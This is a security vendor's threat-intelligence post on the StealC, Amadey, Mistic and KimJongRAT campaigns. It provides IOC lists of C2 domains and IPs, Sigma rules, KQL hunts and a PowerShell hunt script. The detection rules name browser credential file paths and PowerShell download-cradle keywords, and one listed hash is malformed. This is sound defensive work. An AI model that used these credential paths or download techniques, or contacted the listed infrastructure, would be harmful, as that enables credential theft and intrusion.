Back to Intelligence

StealC, Amadey, and Mistic: Multi-Vector Infostealer & Access Broker Surge — OTX Pulse Analysis

SA
Security Arsenal Team
June 27, 2026
5 min read

Recent OTX pulses reveal a coordinated surge in infostealer and initial access broker (IAB) activity targeting enterprise credentials and session tokens. The intelligence highlights a convergence of Malware-as-a-Service (MaaS) families like StealC and Amadey, advanced backdoors like Mistic (linked to the Woodgnat IAB), and persistent APT activity from Kimsuky using KimJongRAT. Despite the disruption of Amadey and Stealc infrastructure via Operation Endgame, actors are rapidly pivoting to new domains and IPs. The primary objective across these campaigns is credential harvesting (cookies, passwords, crypto-wallets) to facilitate downstream ransomware operations or financial fraud.

Threat Actor / Malware Profile

StealC & Amadey

  • Type: Infostealer / Loader (MaaS)
  • Distribution: Phishing attachments, malicious SEO, fake software updates.
  • Behavior: StealC (C++) harvests data from browsers, crypto-wallets, and messaging apps. It acts as a secondary loader. Amadey is a modular botnet known for downloading third-party payloads.
  • C2 Communication: HTTP/HTTPS POST requests to specific domain paths (e.g., /ms/index.php).

Mistic & Woodgnat

  • Type: Backdoor / Initial Access Broker
  • Actor: Woodgnat (associated with Qilin, Black Basta ransomware).
  • Distribution: Social engineering and sideloading.
  • Behavior: Mistic is a stealthy backdoor deployed via DLL sideloading. It establishes persistence and facilitates lateral movement for ransomware deployment.

KimJongRAT

  • Type: RAT / Infostealer
  • Actor: Kimsuky (North Korean APT).
  • Distribution: Phishing emails with shortened URLs pointing to GitHub Releases hosting malicious ZIPs.
  • Behavior: Combines information stealing with remote access. Uses the "LOTS" (Living Off The Land Sites) technique for C2.

IOC Analysis

The provided pulses contain a mix of network and file-based indicators:

  • Domains & URLs: Several indicators utilize typosquatting (e.g., microsoft-telemetry.at) or suspicious top-level domains to mimic legitimate services. URLs often point to PHP gateways for C2 communication.
  • IP Addresses: Infrastructure IPs (e.g., 176.124.199.207) act as direct C2 servers. Operation Endgame has disrupted many, but active IPs remain dangerous.
  • File Hashes: SHA256 hashes are provided for payload executables and loaders.

Operationalization: SOC teams should immediately ingest these IOCs into EDR blocklists and SIEM correlation engines. Domains should be blocked at the perimeter (DNS sinkhole). File hashes should be used to scour endpoints for historical presence. Tools like Cortex XSOAR, Splunk, or Microsoft Sentinel can automate the hunting process.

Detection Engineering

YAML
---
title: Potential StealC or Amadey Infostealer Activity
date: 2026/06/27
status: experimental
description: Detects behavior consistent with StealC or Amadey infostealers accessing browser credential files.
references:
    - https://www.microsoft.com/en-us/security/blog/2026/06/24/stealc-and-amadey-breaking-down-infostealers-and-the-cybercrime-services-that-deliver-them/
author: Security Arsenal
logsource:
    category: file_access
    product: windows
detection:
    selection:
        TargetFilename|contains:
            - '\Google\Chrome\User Data\Default\Login Data'
            - '\AppData\Local\Google\Chrome\User Data\Default\Cookies'
            - '\AppData\Roaming\Mozilla\Firefox\Profiles\'
            - '\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Login Data'
    filter_legitimate:
        Image|endswith:
            - '\chrome.exe'
            - '\firefox.exe'
            - '\brave.exe'
    condition: selection and not filter_legitimate
falsepositives:
    - Legitimate password managers accessing browser stores
level: high
---
title: Suspicious DLL Sideloading via Rundll32 (Mistic Backdoor)
date: 2026/06/27
status: experimental
description: Detects potential sideloading technique used by Mistic backdoor where rundll32.exe loads a DLL from a suspicious directory.
references:
    - https://www.security.com/threat-intelligence/new-mistic-backdoor-modelorat
author: Security Arsenal
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\rundll32.exe'
        CommandLine|contains: '.dll'
    filter_paths:
        CommandLine|contains:
            - 'C:\Windows\System32\'
            - 'C:\Windows\SysWOW64\'
    condition: selection and not filter_paths
falsepositives:
    - Legitimate software installers
level: high
---
title: Suspicious PowerShell Download from GitHub (Kimsuky/JINX-0164)
date: 2026/06/27
status: experimental
description: Detects PowerShell scripts downloading content from GitHub, a tactic used by Kimsuky (LOTS) and JINX-0164.
references:
    - https://sect.iij.ad.jp/blog/2026/06/continuous-evolution-of-kimjongrat-2026/
author: Security Arsenal
logsource:
    category: process_creation
    product: windows
detection:
    selection_pwsh:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
    selection_cmd:
        CommandLine|contains:
            - 'Invoke-WebRequest'
            - 'IEX'
            - 'DownloadString'
    selection_github:
        CommandLine|contains:
            - 'github.com'
            - 'githubusercontent.com'
    condition: all of selection_*
falsepositives:
    - Developers using PowerShell scripts to manage GitHub repos
level: medium


kql
// Hunt for specific IOCs in Network Events
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any (
    "microsoft-telemetry.at", 
    "svclsc.com", 
    "goodpanelforgoodjob.com", 
    "authorized-logins.net",
    "mueleer.com",
    "driver-updater.net",
    "teamicrosoft.com",
    "live.ong",
    "corpsecs.com",
    "servequake.com"
    )
    or RemoteIP in ("176.124.199.207", "176.111.174.140", "62.60.226.159", "94.154.35.25", "64.188.91.237", "196.251.107.130", "104.200.67.46", "89.36.224.5")
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl, RemoteIP, RemotePort
;

// Hunt for malicious file hashes
DeviceFileEvents
| where Timestamp > ago(7d)
| where SHA256 in (
    "8cef760d11d24fc2e9bbd9f770dca5105854f7ece3b0e6948d7c8b7fdd1765ea",
    "ff8d2afd9d7f0a828592fee34ca55d1a3542f7ed",
    "3f797a639bc855bc6d5471f327924b62d10900ddec49b970eca6604142bbb4be",
    "b6cab0b3aa8e56e2427f486c74588d598ae58bb0cbc0eda6939fe171cb0aed17",
    "9758e76b601798a30d903bf05052a53df80451e5c156548ce9da828f608b6470",
    "221a39856b37e3c682f62427f1e6b965b36a2405764689c914672770a01a1fa9"
)
| project Timestamp, DeviceName, FileName, FolderPath, SHA256, InitiatingProcessAccountName


powershell
# IOC Hunt Script - StealC, Amadey, Mistic, KimJongRAT
# Requires Administrator privileges

$MaliciousHashes = @(
    "8cef760d11d24fc2e9bbd9f770dca5105854f7ece3b0e6948d7c8b7fdd1765ea",
    "ff8d2afd9d7f0a828592fee34ca55d1a3542f7ed",
    "3f797a639bc855bc6d5471f327924b62d10900ddec49b970eca6604142bbb4be",
    "b6cab0b3aa8e56e2427f486c74588d598ae58bb0cbc0eda6939fe171cb0aed17",
    "9758e76b601798a30d903bf05052a53df80451e5c156548ce9da828f608b6470",
    "221a39856b37e3c682f62427f1e6b965b36a2405764689c914672770a01a1fa9"
)

$MaliciousDomains = @(
    "microsoft-telemetry.at",
    "svclsc.com",
    "goodpanelforgoodjob.com",
    "authorized-logins.net",
    "mueleer.com",
    "grande-luna.top",
    "oeannon.com",
    "thomphon.com",
    "human-check.top",
    "update-fall.com",
    "driver-updater.net",
    "teamicrosoft.com",
    "live.ong",
    "corpsecs.com"
)

Write-Host "[+] Checking Hosts file for malicious domain redirects..." -ForegroundColor Cyan
$HostsPath = "$env:SystemRoot\System32\drivers\etc\hosts"
if (Test-Path $HostsPath) {
    $HostsContent = Get-Content $HostsPath
    foreach ($Domain in $MaliciousDomains) {
        if ($HostsContent -match $Domain) {
            Write-Host "[!] ALERT: $Domain found in hosts file!" -ForegroundColor Red
        }
    }
}

Write-Host "[+] Checking active network connections for C2 IPs..." -ForegroundColor Cyan
$C2IPs = @("176.124.199.207", "176.111.174.140", "62.60.226.159", "94.154.35.25", "104.200.67.46", "89.36.224.5")
$Connections = Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue
foreach ($IP in $C2IPs) {
    $Found = $Connections | Where-Object { $_.RemoteAddress -eq $IP }
    if ($Found) {
        Write-Host "[!] ALERT: Active connection to C2 IP $IP detected (PID: $($Found.OwningProcess))" -ForegroundColor Red
        Get-Process -Id ($Found.OwningProcess) | Select-Object ProcessName, Path
    }
}

Write-Host "[+] Scan complete." -ForegroundColor Green


# Response Priorities

Immediate

  • Block IOCs: Push all domain and IP indicators to perimeter firewalls, Secure Web Gateways, and DNS sinkholes.
  • Hunt for Execution: Run the provided PowerShell script across the fleet to identify active connections to C2 infrastructure (specifically Amadey and Stealc IPs).

24h

  • Identity Verification: Given the prevalence of infostealers (StealC, Lumma, RedLine) harvesting session tokens, enforce forced re-authentication for all users and revoke active sessions. Reset passwords for accounts suspected of compromise.

1 Week

  • Architecture Hardening: Implement application controls to prevent unauthorized sideloading (Mistic backdoor vector) and restrict access to GitHub/raw content from non-development workstations to mitigate LOTS-based attacks (KimJongRAT).

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-credentialsinfostealerstealcamadeywoodgnatkimjongrat

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action